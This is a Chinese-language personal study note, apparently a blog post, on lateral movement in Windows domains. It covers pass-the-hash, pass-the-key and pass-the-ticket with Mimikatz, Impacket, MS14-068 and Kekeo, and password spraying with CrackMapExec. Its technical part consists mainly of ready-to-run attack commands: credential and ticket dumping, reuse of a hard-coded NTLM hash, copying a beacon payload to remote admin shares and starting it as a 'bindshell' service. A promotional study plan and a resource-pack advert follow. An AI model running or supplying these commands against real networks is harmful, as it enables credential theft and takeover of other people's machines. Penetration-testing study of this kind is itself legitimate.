7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射

用途：个人学习笔记，有所借鉴，欢迎指正

目录

一、域横向移动-PTH-Mimikatz&NTLM

1、Mimikatz

2、impacket-at&ps&wmi&smb

二、域横向移动-PTK-Mimikatz&AES256

三、域横向移动-PTT-漏洞&Kekeo&Ticket

1、漏洞-MS14068(webadmin权限）——利用漏洞生成的用户的新身份票据尝试认证

2、kekeo(高权限，需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

3、mimikatz(高权限，需Ticket)——利用历史遗留票据重新认证尝试

四、Linux系统+Proxychains+CrackMapExec-密码喷射

---

一、域横向移动-PTH-Mimikatz&NTLM

PTH=Pass The Hash，通过密码散列值（通常是NTLM Hash)来进行攻击。
在域环境中，用户登录计算机时使用的域账号，计算机会用相同本地管理员账号和密码。
因此，如果计算机的本地管理员账号和密码也是相同的，攻击者就可以使用哈希传递的方
法登录到内网主机的其他计算机。另外注意在window Server 2012 R2之前使用到的密
码散列值是LM、NTLM，在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

1、Mimikatz

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
net use \\192.168.3.32/c$
copy beacon.exe \\192.168.3.32\c$
sc \\sqlserver create bindshell binpath="c:\4444.exe"
sc \\sqlserver start bindahell

2、impacket-at&ps&wmi&smb

Psexec -hashes :NTLM值 域名/域用户@域内ip地址
smbexec -hashes :NTLM值 域名/域用户@域内ip地址
wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

二、域横向移动-PTK-Mimikatz&AES256

PTK=Pass The Key，当系统安装了KB2871997补丁且禁用了NTLM的时候，
那我们抓取到的ntlm hash也就失去了作用，但是可以通过PTK的攻击方式获得权限。

mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 

三、域横向移动-PTT-漏洞&Kekeo&Ticket

资源地址：

https://github.com/abatchy17/windowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases

1、漏洞-MS14068(webadmin权限）——利用漏洞生成的用户的新身份票据尝试认证

MS14-068是密钥分发中心（KDC）服务中的windows漏洞。它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos
TGT来获得票证

注意：成功不成功看DC域控漏洞补丁打没打

获取SID值：shell whoami/user
生成票据文件：shell ms14-068.exe -u webadmin@god.org -s
s-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
清除票据连接：
shell klist purge
内存导入票据：
mimikatz kerberos:ptc TGT_webadmin@god.org.ccache
连接目标上线：
shell dir \\OWA2010CN-GOD\c$
shell net use \\OWA2010CN-GOD\c$
copy beacon.exe \\OWA2010CN-GOD/c$
sc \\OWA2010CN-GOD create bindshell binpath= "c:\beacon.exe"
sc \\OWA2010CN-GOD start bindshell

2、kekeo(高权限，需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据，
我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗
缺点：票据是有有效期的，所以如果当前主机在连接过域控的话，有效期内可利用。

注意：成功率看ntlm哈希值的正确性

生成票据：shell kekeo "tgt::ask /user:Administrator /domain god.org /ntim:ocef208c6485269c20db2cad21734fe7" "exit"
导入票据: shell kekeo "kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi " "exit"
查看票据：shell klist
利用票据连接：shell dir \\owa2010cn-god\c$

3、mimikatz(高权限，需Ticket)——利用历史遗留票据重新认证尝试

导出票据：
mimikatz sekurlsa::tickets /export

导入票据：
mimikatz kerberos::ptt C:
\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbi

shell klist

四、Linux系统+Proxychains+CrackMapExec-密码喷射

CrackMapExec
https://github.com/Porchetta Industries/CrackMapExec
官方手册：https://mpgn.gitbook.io/crackmapexec/
部分案例：https://www.freebuf.com/sectool/184573.html

下载对应release,建立socks连接，设置socks代理，配置规则，调用！
Linux系统代理工具： Proxychains使用
安装使用：
https://blog.csdn.net/qq_53086690/article/details/121779832
代理配置：Proxychains.conf
代理调用：Proxychains 命令

#域用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c 
#本地用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --1ocal-auth    

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、 网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三：顶级网络安全工程师

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

学习资料分享

当然，只给予计划不给予学习资料的行为无异于耍流氓，这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包，可点击下方二维码链接领取哦。